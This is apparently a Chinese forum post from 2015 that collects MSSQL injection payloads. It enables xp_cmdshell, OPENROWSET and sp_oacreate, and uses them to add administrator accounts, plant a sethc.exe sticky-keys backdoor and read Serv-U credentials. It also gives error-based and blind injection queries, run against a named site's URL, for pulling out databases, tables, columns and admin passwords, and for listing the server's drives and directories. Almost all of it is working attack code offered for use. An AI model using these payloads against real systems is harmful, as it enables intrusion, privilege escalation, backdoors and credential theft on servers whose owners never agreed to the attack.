|
|
一.开启扩展
1.开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXECsp_configure 'xp_cmdshell', 1;RECONFIGURE;--
关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXECsp_configure 'xp_cmdshell', 0;RECONFIGURE;--
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)
2.开启'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;execsp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--
查询分析器里执行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234/add")')来利用沙盘来添加个管理员
3.开启'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;execsp_configure 'Ole Automation Procedures',1;RECONFIGURE;--
拷贝文件d:/windows/explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @oout ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe','c:/sethc.exe';
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUTEXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcodexcode /add'
这段代码就是利用SP_OAcreate来添加一个xcode的系统用户 然后直接提升为管理员权限
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out,'d:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来
二.有显错,暴。
and 0<(select count(*) frommaster.dbo.sysdatabases);--折半法得到数据库个数
and 0<(select count(*) from master.dbo.sysdatabases wherename>1 and dbid=1);--依次提交 dbid = 2.3.4... 得到更多的数据库名
and 0<(select count(*) name from employ.dbo.sysobjects wherextype='U');--折半法得到表个数(假设暴出库名employ)
and 0<(select top 1 name from employ.dbo.sysobjects wherextype='U');--爆出一个表名
假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj'以此一直加条件...
and 0<(select top 1 name from syscolumns where id in (selectid from sysobjects where type = 'u' and name ='employ_qj'));--爆出一个列名
假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....
或者
爆库语句
and (select top 1 isnull(cast([name] asnvarchar(500)),char(32))+char(124) from[master].[dbo].[sysdatabases] where dbid in (select top N dbid from[master].[dbo].[sysdatabases] order by dbid desc))=0--
爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top Nname from somedb.sys.all_objects where type=char(85) order by name)t order by name desc)=0--
爆字段语句,爆表admin里user='admin'的密码段
And (Select Top 1 isNull(cast([password] asvarchar(2000)),char(32))+char(124) From (Select Top N [password]From [somedb]..[admin] Where user='admin' Order by [password]) TOrder by [password]Desc)=0--
三.无显错,盲注。
先说下SQL2005中的查询方法
select * frommaster.dbo.sysdatabases --查询数据库
select * from NetBook.dbo.sysobjects wherextype='u' --查询数据库NetBook里的表
select * from NetBook.dbo.syscolumns where id=object_id('book')--查询book表里的字段
判断权限:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))
盲注常规步骤:
判断库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select@@version),22,4)='2005'
猜数据库名:
先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) frommaster.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) frommaster.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) frommaster.dbo.sysdatabases where dbid=5 andascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database):
可以尝试先看有没管理表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.sysobjects where xtype='u' and name like'%admin%')=1
猜第一个,先长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.sysobjects where name in (select top 1 name fromdatabase.dbo.sysobjects where xtype='u') and len(name)=9)=1
猜第一个表名,逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.sysobjects where name in (select top 1 name fromdatabase.dbo.sysobjects where xtype='u') andascii(substring(name,1,1))>90)=1
猜第二个表名(假设第一个为table1):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.sysobjects where name in (select top 1 name fromdatabase.dbo.sysobjects where xtype='u' and name not in ('table1'))and ascii(substring(name,1,1))>90)=1
...
猜字段(假设表名已经猜出为table):
猜第一个字段:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.syscolumns where name in (select top 1 name fromdatabase_db.dbo.syscolumns whereid=object_id('database.dbo.table')) andascii(substring(name,1,1))>90)=1
猜第二个(假设第一个为column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.syscolumns where name in (select top 1 name fromdatabase_db.dbo.syscolumns where id=object_id('database.dbo.table')and name not in ('column1')) andascii(substring(name,1,1))>90)=1
...
猜数据(假设要猜的字段为name):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) fromdatabase.dbo.table where name in (select top 1 name fromdatabase_db.dbo.table) and ascii(substring(name,1,1))>90)=1
...
四.其他一些语句(列目录)
1.查看驱动器
建表p(i为自动编号,a记录盘符类似"c:/",b记录可用字节,其它省略)
;create table p(i int identity(1,1),a nvarchar(255),bnvarchar(255),c nvarchar(255),d nvarchar(255));--
;insert p exec xp_availablemedia;--列出所有驱动器并插入表p
and (select count(*) from p)>3;--折半法查出驱动器总数
and ascii(substring((select a from p wherei=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)
上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名
and (select a from p where i=1)>3;--报错得到第一个驱动器名
上面一般用于显错情况下使用-------以此类推,得到所有驱动器名
;drop table p;--删除表p
2.查看目录
;create table pa(m nvarchar(255),invarchar(255));--建表pa(m记录目录,i记录深度)/
;insert pa exec xp_dirtree 'e:';--列出驱动器e并插入表pa
and (select count(*) from pa where i>0)>-1;--折半法查出i深度
and (select top 1 m from pa where i=1 and m not in(select top 0m from pa))>0;--报错得到深度i=1的第一个目录名
上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top1",换深度只换i就行)以此类推,得到e盘的所有目录
and len((select top 1 m from pa where i=1 and m not in(selecttop 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度
and ascii(substring((select top 1 m from pa where i=1 and m notin(select top 0 m frompa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度
上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top1",换深度只换i就行)以此类推,得到e盘的所有目录
;drop table pa;--删除表pa
经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录) |
|
发表于 2015-10-9 10:06:10
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏